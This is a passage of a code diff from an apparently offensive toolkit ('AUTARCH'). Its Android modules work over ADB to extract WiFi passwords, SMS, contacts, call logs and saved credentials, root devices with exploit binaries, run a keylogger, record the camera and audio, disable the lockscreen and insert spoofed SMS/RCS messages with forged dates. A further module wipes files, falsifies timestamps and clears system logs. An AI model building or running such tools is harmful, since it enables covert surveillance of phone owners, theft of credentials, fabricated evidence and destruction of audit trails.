"""Interactive menu for Android device reconnaissance."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Device Reconnaissance")
print(f"{'='*50}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Full Device Dump")
print(" [2] Installed Accounts")
print(" [3] WiFi Passwords [ROOT]")
print(" [4] Call Logs")
print(" [5] SMS Messages")
print(" [6] Contacts")
print(" [7] Browser History [ROOT]")
print(" [8] Saved Credentials [ROOT]")
print(" [9] Export Full Report")
print(" [s] Select Device")
print(" [0] Back")
print()
def device_dump(self):
if not self._ensure_device():
return
print(" Running full device dump...")
dump = self.mgr.full_device_dump(self.serial)
print(f"\n SELinux: {dump.get('selinux', 'unknown')}")
print(f" Kernel: {dump.get('kernel', 'unknown')}")
print(f" Fingerprint: {dump.get('fingerprint', 'unknown')}")
print(f" Packages: {dump.get('package_count', '?')}")
info = dump.get('device_info', {})
if info:
print(f"\n Device Info:")
for k, v in info.items():
print(f" {k:<20} {v}")
def accounts(self):
if not self._ensure_device():
return
result = self.mgr.get_accounts(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} accounts:")
for a in result['accounts']:
print(f" {a['name']} ({a['type']})")
def wifi_passwords(self):
if not self._ensure_device():
return
print(" Extracting WiFi passwords (requires root)...")
result = self.mgr.get_wifi_passwords(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} saved networks:")
for w in result['passwords']:
print(f" SSID: {w['ssid']}")
print(f" PSK: {w['password']}")
print()
def call_logs(self):
if not self._ensure_device():
return
result = self.mgr.extract_call_logs(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} call log entries:")
print(f" {'Number':<20} {'Type':<12} {'Duration'}")
print(f" {'-'*50}")
for c in result['calls'][:50]:
print(f" {c.get('number','?'):<20} {c.get('type_label','?'):<12} {c.get('duration','?')}s")
def sms_messages(self):
if not self._ensure_device():
return
result = self.mgr.extract_sms(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} SMS messages:")
for m in result['messages'][:30]:
print(f"\n [{m.get('type_label','?')}] {m.get('address','?')}")
body = m.get('body', '')
if len(body) > 100:
body = body[:100] + '...'
print(f" {body}")
def contacts(self):
if not self._ensure_device():
return
result = self.mgr.extract_contacts(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} contacts:")
print(f" {'Name':<25} {'Number'}")
print(f" {'-'*45}")
for c in result['contacts']:
print(f" {c.get('display_name','?'):<25} {c.get('number','?')}")
def browser_history(self):
if not self._ensure_device():
return
print(" Extracting browser history (requires root)...")
result = self.mgr.extract_browser_history(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} history entries:")
for h in result['history'][:30]:
title = h.get('title', '')[:50]
print(f" {title}")
print(f" {h['url']}")
def saved_credentials(self):
if not self._ensure_device():
return
print(" Extracting saved credentials (requires root)...")
result = self.mgr.extract_saved_credentials(self.serial)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} saved credentials:")
for c in result['credentials']:
print(f" URL: {c['url']}")
print(f" User: {c['username']}")
print(f" Pass: {'[encrypted]' if c['password_encrypted'] else '[empty]'}")
print()
def export_report(self):
if not self._ensure_device():
return
print(" Generating full recon report...")
result = self.mgr.export_recon_report(self.serial)
if result['success']:
print(f" Report saved: {result['report_path']}")
print(f" Sections: {', '.join(result['sections'])}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
actions = {
'0': None,
'1': self.device_dump,
'2': self.accounts,
'3': self.wifi_passwords,
'4': self.call_logs,
'5': self.sms_messages,
'6': self.contacts,
'7': self.browser_history,
'8': self.saved_credentials,
'9': self.export_report,
's': self._select_device,
}
if choice == '0':
break
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidRecon()
m.run_interactive()

163
modules/android_root.py Normal file
View File

@@ -0,0 +1,163 @@
"""
Android Root Methods - Root detection, Magisk install, exploit-based rooting
"""
DESCRIPTION = "Android root methods (Magisk, exploits, root detection)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidRoot:
"""Interactive menu for Android rooting operations."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Root Methods")
print(f"{'='*50}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Check Root Status")
print(" [2] Install Magisk APK")
print(" [3] Pull Patched Boot Image")
print(" [4] Root via Exploit")
print(" [5] ADB Root Shell (debug builds)")
print(" [s] Select Device")
print(" [0] Back")
print()
def check_root(self):
if not self._ensure_device():
return
print(" Checking root status...")
result = self.mgr.check_root(self.serial)
print(f"\n Rooted: {'YES' if result['rooted'] else 'NO'}")
if result['method']:
print(f" Method: {result['method']}")
if result['version']:
print(f" Version: {result['version']}")
details = result.get('details', {})
if details:
print(f" Details:")
for k, v in details.items():
print(f" {k}: {v}")
def install_magisk(self):
if not self._ensure_device():
return
try:
apk = input(" Magisk APK path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not apk:
return
print(" Installing Magisk APK...")
result = self.mgr.install_magisk(self.serial, apk)
if result['success']:
print(" Magisk installed successfully.")
print(" Next: Open Magisk app, patch boot image, then flash patched boot.")
else:
print(f" Error: {result.get('error', result.get('output', 'Failed'))}")
def pull_patched(self):
if not self._ensure_device():
return
print(" Looking for patched boot image...")
result = self.mgr.pull_patched_boot(self.serial)
if result['success']:
size_mb = result['size'] / (1024 * 1024)
print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
print(" Next: Reboot to fastboot, flash this as boot partition.")
else:
print(f" Error: {result.get('error', 'Failed')}")
def root_exploit(self):
if not self._ensure_device():
return
try:
exploit = input(" Exploit binary path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not exploit:
return
print(" Deploying and executing exploit...")
result = self.mgr.root_via_exploit(self.serial, exploit)
if result['success']:
print(" ROOT OBTAINED!")
else:
print(" Root not obtained.")
print(f" Exploit output:\n{result.get('exploit_output', '')}")
def adb_root(self):
if not self._ensure_device():
return
print(" Attempting adb root (userdebug/eng builds only)...")
result = self.mgr.adb_root_shell(self.serial)
if result['success']:
print(" ADB running as root.")
else:
print(f" Failed: {result['output']}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.check_root,
'2': self.install_magisk,
'3': self.pull_patched,
'4': self.root_exploit,
'5': self.adb_root,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidRoot()
m.run_interactive()

220
modules/android_screen.py Normal file
View File

@@ -0,0 +1,220 @@
"""
Android Screen & Input Control - Screenshots, recording, input injection, keylogger
"""
DESCRIPTION = "Android screen capture, input injection, keylogger, camera/audio"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidScreen:
"""Interactive menu for screen/input/capture operations."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
print(f" {i}) {d['serial']} {d.get('model','')}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*55}")
print(" Screen & Input Control")
print(f"{'='*55}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" ── Capture ──")
print(" [1] Screenshot")
print(" [2] Screen Record")
print(" [3] Camera Photo")
print(" [4] Audio Record")
print()
print(" ── Input Injection ──")
print(" [5] Tap Coordinates")
print(" [6] Swipe")
print(" [7] Type Text")
print(" [8] Send Key Event")
print(" [9] Wake / Dismiss Lockscreen")
print(" [10] Disable Lockscreen")
print()
print(" ── Keylogger ──")
print(" [11] Start Keylogger")
print(" [12] Stop & Pull Keylog")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def screenshot(self):
if not self._ensure_device(): return
print(" Capturing screenshot...")
r = self.mgr.screen_capture(self.serial)
if r['success']:
print(f" Saved: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r.get('error')}")
def screen_record(self):
if not self._ensure_device(): return
try:
dur = input(" Duration in seconds [10]: ").strip()
dur = int(dur) if dur else 10
except (ValueError, EOFError, KeyboardInterrupt):
return
print(f" Recording for {dur}s...")
r = self.mgr.screen_record(self.serial, duration=dur)
if r['success']:
print(f" Saved: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r.get('error')}")
def camera(self):
if not self._ensure_device(): return
try:
cam = input(" Camera [back/front]: ").strip() or 'back'
except (EOFError, KeyboardInterrupt):
return
print(" Opening camera (device screen will activate)...")
r = self.mgr.camera_capture(self.serial, camera=cam)
if r['success']:
print(f" Photo saved: {r['path']}")
else:
print(f" Note: {r.get('error')}")
def audio(self):
if not self._ensure_device(): return
try:
dur = input(" Duration in seconds [10]: ").strip()
dur = int(dur) if dur else 10
except (ValueError, EOFError, KeyboardInterrupt):
return
r = self.mgr.audio_record(self.serial, duration=dur)
print(f" {r.get('note', 'Started')}")
def tap(self):
if not self._ensure_device(): return
try:
x = int(input(" X coordinate: ").strip())
y = int(input(" Y coordinate: ").strip())
except (ValueError, EOFError, KeyboardInterrupt):
return
self.mgr.input_tap(self.serial, x, y)
print(f" Tapped ({x}, {y})")
def swipe(self):
if not self._ensure_device(): return
try:
x1 = int(input(" From X: ").strip())
y1 = int(input(" From Y: ").strip())
x2 = int(input(" To X: ").strip())
y2 = int(input(" To Y: ").strip())
ms = input(" Duration ms [300]: ").strip()
ms = int(ms) if ms else 300
except (ValueError, EOFError, KeyboardInterrupt):
return
self.mgr.input_swipe(self.serial, x1, y1, x2, y2, ms)
print(f" Swiped ({x1},{y1}) -> ({x2},{y2})")
def type_text(self):
if not self._ensure_device(): return
try:
text = input(" Text to type: ").strip()
except (EOFError, KeyboardInterrupt):
return
if text:
self.mgr.input_text(self.serial, text)
print(f" Typed: {text[:50]}")
def keyevent(self):
if not self._ensure_device(): return
print(" Common: 3=HOME 4=BACK 26=POWER 82=MENU 24/25=VOL 187=RECENTS 224=WAKEUP")
try:
code = input(" Keycode: ").strip()
except (EOFError, KeyboardInterrupt):
return
if code:
self.mgr.input_keyevent(self.serial, code)
print(f" Sent keyevent {code}")
def wake_dismiss(self):
if not self._ensure_device(): return
r = self.mgr.dismiss_lockscreen(self.serial)
print(f" Lock screen: {'still locked' if r['locked'] else 'dismissed'}")
def disable_lock(self):
if not self._ensure_device(): return
r = self.mgr.disable_lockscreen(self.serial)
print(" Attempted lock screen disable:")
for x in r['results']:
print(f" {x['cmd']}: rc={x['rc']}")
def start_keylog(self):
if not self._ensure_device(): return
r = self.mgr.start_keylogger(self.serial)
print(f" Keylogger started, PID: {r['pid']}, log: {r['log_path']}")
def stop_keylog(self):
if not self._ensure_device(): return
r = self.mgr.stop_keylogger(self.serial)
if r['success']:
print(f" Keylog saved: {r['path']} ({r['size']} bytes)")
else:
print(f" {r.get('error')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.screenshot, '2': self.screen_record,
'3': self.camera, '4': self.audio,
'5': self.tap, '6': self.swipe,
'7': self.type_text, '8': self.keyevent,
'9': self.wake_dismiss, '10': self.disable_lock,
'11': self.start_keylog, '12': self.stop_keylog,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidScreen()
m.run_interactive()

359
modules/android_sms.py Normal file
View File

@@ -0,0 +1,359 @@
"""
Android SMS/RCS Manipulation - Insert, delete, spoof messages with custom timestamps
"""
DESCRIPTION = "Android SMS/RCS manipulation (add, remove, spoof dates, RCS inject)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidSms:
"""Interactive menu for SMS/RCS manipulation."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*55}")
print(" SMS / RCS Manipulation")
print(f"{'='*55}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" ── SMS (content provider) ──")
print(" [1] List SMS Messages")
print(" [2] Insert SMS (spoofed)")
print(" [3] Insert Batch SMS")
print(" [4] Edit SMS")
print(" [5] Delete SMS by ID")
print(" [6] Delete SMS by Number")
print(" [7] Delete ALL SMS")
print()
print(" ── RCS (Google Messages) ── [ROOT]")
print(" [8] Check RCS Support")
print(" [9] List RCS Messages")
print(" [a] Insert RCS Message (spoofed)")
print(" [b] Delete RCS Message")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def list_sms(self):
if not self._ensure_device():
return
try:
addr = input(" Filter by number (Enter for all): ").strip() or None
limit = input(" Limit [50]: ").strip()
limit = int(limit) if limit else 50
except (EOFError, KeyboardInterrupt, ValueError):
return
result = self.mgr.sms_list(self.serial, limit=limit, address=addr)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} messages:")
print(f" {'ID':<6} {'Type':<8} {'Address':<16} {'Date':<20} Body")
print(f" {'-'*75}")
for m in result['messages']:
body = m.get('body', '')
if len(body) > 40:
body = body[:40] + '...'
date = m.get('date_readable', m.get('date', '?'))
print(f" {m.get('_id','?'):<6} {m.get('type_label','?'):<8} {m.get('address','?'):<16} {date:<20} {body}")
def insert_sms(self):
if not self._ensure_device():
return
try:
print("\n Insert Spoofed SMS")
print(f" {'-'*40}")
address = input(" Phone number: ").strip()
if not address:
return
body = input(" Message body: ").strip()
if not body:
return
print(" Type: 1=inbox (received), 2=sent, 3=draft")
msg_type = input(" Type [inbox]: ").strip() or 'inbox'
date = input(" Date (YYYY-MM-DD) [today]: ").strip() or None
time_val = input(" Time (HH:MM:SS) [now]: ").strip() or None
read = input(" Mark as read? [Y/n]: ").strip().lower() != 'n'
except (EOFError, KeyboardInterrupt):
return
print(" Inserting...")
result = self.mgr.sms_insert(self.serial, address, body,
date_str=date, time_str=time_val,
msg_type=msg_type, read=read)
if result['success']:
print(f" SMS inserted:")
print(f" From/To: {result['address']}")
print(f" Date: {result['date']}")
print(f" Type: {result['type']}")
print(f" Body: {result['body'][:60]}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def insert_batch(self):
if not self._ensure_device():
return
print("\n Batch SMS Insert")
print(" Enter messages one per line. Format:")
print(" number|body|YYYY-MM-DD|HH:MM:SS|type")
print(" Type is inbox/sent. Date/time optional. Empty line to finish.")
print()
messages = []
while True:
try:
line = input(" > ").strip()
except (EOFError, KeyboardInterrupt):
break
if not line:
break
parts = line.split('|')
if len(parts) < 2:
print(" Need at least: number|body")
continue
msg = {'address': parts[0].strip(), 'body': parts[1].strip()}
if len(parts) >= 3 and parts[2].strip():
msg['date'] = parts[2].strip()
if len(parts) >= 4 and parts[3].strip():
msg['time'] = parts[3].strip()
if len(parts) >= 5 and parts[4].strip():
msg['type'] = parts[4].strip()
messages.append(msg)
print(f" Queued: {msg['address']} -> {msg['body'][:30]}")
if not messages:
print(" No messages to insert.")
return
print(f"\n Inserting {len(messages)} messages...")
result = self.mgr.sms_bulk_insert(self.serial, messages)
print(f" Done: {result['inserted']}/{result['total']} inserted successfully.")
def edit_sms(self):
if not self._ensure_device():
return
try:
sms_id = input(" SMS _id to edit: ").strip()
if not sms_id:
return
print(" Leave fields blank to keep current value.")
body = input(" New body (or Enter to skip): ").strip() or None
address = input(" New address (or Enter to skip): ").strip() or None
date = input(" New date YYYY-MM-DD (or Enter): ").strip() or None
time_val = input(" New time HH:MM:SS (or Enter): ").strip() or None
msg_type = input(" New type inbox/sent (or Enter): ").strip() or None
except (EOFError, KeyboardInterrupt):
return
result = self.mgr.sms_update(self.serial, sms_id, body=body, address=address,
date_str=date, time_str=time_val, msg_type=msg_type)
if result['success']:
print(f" SMS {sms_id} updated.")
else:
print(f" Error: {result.get('error', 'Failed')}")
def delete_by_id(self):
if not self._ensure_device():
return
try:
sms_id = input(" SMS _id to delete: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not sms_id:
return
result = self.mgr.sms_delete(self.serial, sms_id=sms_id)
if result['success']:
print(f" Deleted SMS #{sms_id}")
else:
print(f" Error: {result.get('error', result.get('output', 'Failed'))}")
def delete_by_number(self):
if not self._ensure_device():
return
try:
address = input(" Phone number to delete all messages from: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not address:
return
try:
confirm = input(f" Delete ALL SMS from {address}? [y/N]: ").strip().lower()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'y':
print(" Cancelled.")
return
result = self.mgr.sms_delete(self.serial, address=address, delete_all_from=True)
if result['success']:
print(f" Deleted all SMS from {address}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def delete_all(self):
if not self._ensure_device():
return
try:
confirm = input(" DELETE ALL SMS on device? Type 'YES': ").strip()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'YES':
print(" Cancelled.")
return
result = self.mgr.sms_delete_all(self.serial)
if result['success']:
print(" All SMS deleted.")
else:
print(f" Error: {result.get('output', 'Failed')}")
def rcs_check(self):
if not self._ensure_device():
return
print(" Checking RCS support...")
info = self.mgr.rcs_check_support(self.serial)
print(f"\n RCS Available: {'YES' if info['rcs_available'] else 'NO'}")
print(f" Messaging App: {info.get('messaging_app', 'not found')}")
print(f" Database: {info.get('database', 'not found (need root)')}")
def rcs_list_msgs(self):
if not self._ensure_device():
return
try:
limit = input(" Limit [50]: ").strip()
limit = int(limit) if limit else 50
except (EOFError, KeyboardInterrupt, ValueError):
return
print(" Fetching RCS messages (requires root)...")
result = self.mgr.rcs_list(self.serial, limit=limit)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} messages:")
print(f" {'ID':<6} {'Proto':<6} {'Date':<20} {'Conv':<20} Text")
print(f" {'-'*80}")
for m in result['messages']:
text = m.get('text', '')
if len(text) > 35:
text = text[:35] + '...'
conv = m.get('conversation_name', '')[:18]
print(f" {m.get('message_id','?'):<6} {m.get('protocol','?'):<6} {m.get('timestamp_readable','?'):<20} {conv:<20} {text}")
def rcs_insert_msg(self):
if not self._ensure_device():
return
try:
print("\n Insert Spoofed RCS Message (requires root)")
print(f" {'-'*45}")
address = input(" Phone number / contact: ").strip()
if not address:
return
body = input(" Message body: ").strip()
if not body:
return
sender = input(" Sender display name (or Enter for number): ").strip() or None
direction = input(" Direction - incoming/outgoing [incoming]: ").strip().lower()
is_out = direction.startswith('out')
date = input(" Date (YYYY-MM-DD) [today]: ").strip() or None
time_val = input(" Time (HH:MM:SS) [now]: ").strip() or None
except (EOFError, KeyboardInterrupt):
return
print(" Injecting RCS message...")
result = self.mgr.rcs_insert(self.serial, address, body,
date_str=date, time_str=time_val,
sender_name=sender, is_outgoing=is_out)
if result['success']:
print(f" RCS message injected:")
print(f" Address: {result['address']}")
print(f" Date: {result['date']}")
print(f" Protocol: {result['protocol']}")
print(f" Dir: {'outgoing' if result['is_outgoing'] else 'incoming'}")
print(f" Body: {result['body'][:60]}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def rcs_delete_msg(self):
if not self._ensure_device():
return
try:
msg_id = input(" RCS message _id to delete: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not msg_id:
return
print(" Deleting RCS message (requires root)...")
result = self.mgr.rcs_delete(self.serial, int(msg_id))
if result['success']:
print(f" Deleted RCS message #{msg_id}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.list_sms,
'2': self.insert_sms,
'3': self.insert_batch,
'4': self.edit_sms,
'5': self.delete_by_id,
'6': self.delete_by_number,
'7': self.delete_all,
'8': self.rcs_check,
'9': self.rcs_list_msgs,
'a': self.rcs_insert_msg,
'b': self.rcs_delete_msg,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidSms()
m.run_interactive()

580
modules/anti_forensics.py Normal file
View File

@@ -0,0 +1,580 @@
"""AUTARCH Anti-Forensics
Secure file deletion, timestamp manipulation, log clearing, metadata scrubbing,
and counter-forensics techniques for operational security.
"""
DESCRIPTION = "Anti-forensics & counter-investigation tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "counter"
import os
import re
import json
import time
import struct
import shutil
import secrets
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
from PIL import Image as PILImage
HAS_PIL = True
except ImportError:
HAS_PIL = False
# ── Secure Deletion ─────────────────────────────────────────────────────────
class SecureDelete:
"""Secure file/directory deletion with overwrite patterns."""
PATTERNS = {
'zeros': b'\x00',
'ones': b'\xFF',
'random': None, # Generated per-pass
'dod_3pass': [b'\x00', None, b'\xFF'], # DoD 5220.22-M simplified
'gutmann': None, # 35 passes with specific patterns
}
@staticmethod
def secure_delete_file(filepath: str, passes: int = 3,
method: str = 'random') -> Dict:
"""Securely delete a file by overwriting before unlinking."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
file_size = os.path.getsize(filepath)
if method == 'dod_3pass':
patterns = [b'\x00', None, b'\xFF']
else:
patterns = [None] * passes # All random
# Overwrite passes
for i, pattern in enumerate(patterns):
with open(filepath, 'r+b') as f:
remaining = file_size
while remaining > 0:
chunk_size = min(4096, remaining)
if pattern is None:
chunk = secrets.token_bytes(chunk_size)
else:
chunk = pattern * chunk_size
f.write(chunk[:chunk_size])
remaining -= chunk_size
f.flush()
os.fsync(f.fileno())
# Truncate to zero
with open(filepath, 'w') as f:
pass
# Rename to random name before deletion (anti-filename recovery)
directory = os.path.dirname(filepath)
random_name = os.path.join(directory, secrets.token_hex(16))
os.rename(filepath, random_name)
os.unlink(random_name)
return {
'ok': True,
'file': filepath,
'size': file_size,
'passes': len(patterns),
'method': method,
'message': f'Securely deleted {filepath} ({file_size} bytes, {len(patterns)} passes)'
}
except PermissionError:
return {'ok': False, 'error': 'Permission denied'}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def secure_delete_directory(dirpath: str, passes: int = 3) -> Dict:
"""Recursively securely delete all files in a directory."""
if not os.path.isdir(dirpath):
return {'ok': False, 'error': 'Directory not found'}
deleted = 0
errors = 0
for root, dirs, files in os.walk(dirpath, topdown=False):
for name in files:
filepath = os.path.join(root, name)
result = SecureDelete.secure_delete_file(filepath, passes)
if result['ok']:
deleted += 1
else:
errors += 1
for name in dirs:
try:
os.rmdir(os.path.join(root, name))
except OSError:
errors += 1
try:
os.rmdir(dirpath)
except OSError:
errors += 1
return {
'ok': True,
'directory': dirpath,
'files_deleted': deleted,
'errors': errors
}
@staticmethod
def wipe_free_space(mount_point: str, passes: int = 1) -> Dict:
"""Fill free space with random data then delete (anti-carving)."""
try:
temp_file = os.path.join(mount_point, f'.wipe_{secrets.token_hex(8)}')
chunk_size = 1024 * 1024 # 1MB
written = 0
with open(temp_file, 'wb') as f:
try:
while True:
f.write(secrets.token_bytes(chunk_size))
written += chunk_size
f.flush()
except (OSError, IOError):
pass # Disk full — expected
os.unlink(temp_file)
return {
'ok': True,
'mount_point': mount_point,
'wiped_bytes': written,
'wiped_mb': round(written / (1024*1024), 1)
}
except Exception as e:
# Clean up temp file
if os.path.exists(temp_file):
os.unlink(temp_file)
return {'ok': False, 'error': str(e)}
# ── Timestamp Manipulation ───────────────────────────────────────────────────
class TimestampManip:
"""File timestamp modification for counter-forensics."""
@staticmethod
def get_timestamps(filepath: str) -> Dict:
"""Get file timestamps."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
stat = os.stat(filepath)
return {
'ok': True,
'file': filepath,
'accessed': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(),
'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
'created': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(),
'atime': stat.st_atime,
'mtime': stat.st_mtime,
'ctime': stat.st_ctime
}
@staticmethod
def set_timestamps(filepath: str, accessed: float = None,
modified: float = None) -> Dict:
"""Set file access and modification timestamps."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
stat = os.stat(filepath)
atime = accessed if accessed is not None else stat.st_atime
mtime = modified if modified is not None else stat.st_mtime
os.utime(filepath, (atime, mtime))
return {
'ok': True,
'file': filepath,
'accessed': datetime.fromtimestamp(atime, timezone.utc).isoformat(),
'modified': datetime.fromtimestamp(mtime, timezone.utc).isoformat()
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def clone_timestamps(source: str, target: str) -> Dict:
"""Copy timestamps from one file to another."""
if not os.path.exists(source):
return {'ok': False, 'error': 'Source file not found'}
if not os.path.exists(target):
return {'ok': False, 'error': 'Target file not found'}
try:
stat = os.stat(source)
os.utime(target, (stat.st_atime, stat.st_mtime))
return {
'ok': True,
'source': source,
'target': target,
'message': 'Timestamps cloned'
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def randomize_timestamps(filepath: str, start_epoch: float = None,
end_epoch: float = None) -> Dict:
"""Set random timestamps within a range."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
if start_epoch is None:
start_epoch = time.time() - 365 * 24 * 3600 # 1 year ago
if end_epoch is None:
end_epoch = time.time()
import random
atime = random.uniform(start_epoch, end_epoch)
mtime = random.uniform(start_epoch, end_epoch)
return TimestampManip.set_timestamps(filepath, atime, mtime)
# ── Log Clearing ─────────────────────────────────────────────────────────────
class LogCleaner:
"""System log manipulation and clearing."""
COMMON_LOG_PATHS = [
'/var/log/auth.log', '/var/log/syslog', '/var/log/messages',
'/var/log/kern.log', '/var/log/daemon.log', '/var/log/secure',
'/var/log/wtmp', '/var/log/btmp', '/var/log/lastlog',
'/var/log/faillog', '/var/log/apache2/access.log',
'/var/log/apache2/error.log', '/var/log/nginx/access.log',
'/var/log/nginx/error.log', '/var/log/mysql/error.log',
]
@staticmethod
def list_logs() -> List[Dict]:
"""List available log files."""
logs = []
for path in LogCleaner.COMMON_LOG_PATHS:
if os.path.exists(path):
try:
stat = os.stat(path)
logs.append({
'path': path,
'size': stat.st_size,
'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
'writable': os.access(path, os.W_OK)
})
except OSError:
pass
return logs
@staticmethod
def clear_log(filepath: str) -> Dict:
"""Clear a log file (truncate to zero)."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
original_size = os.path.getsize(filepath)
with open(filepath, 'w') as f:
pass
return {
'ok': True,
'file': filepath,
'cleared_bytes': original_size
}
except PermissionError:
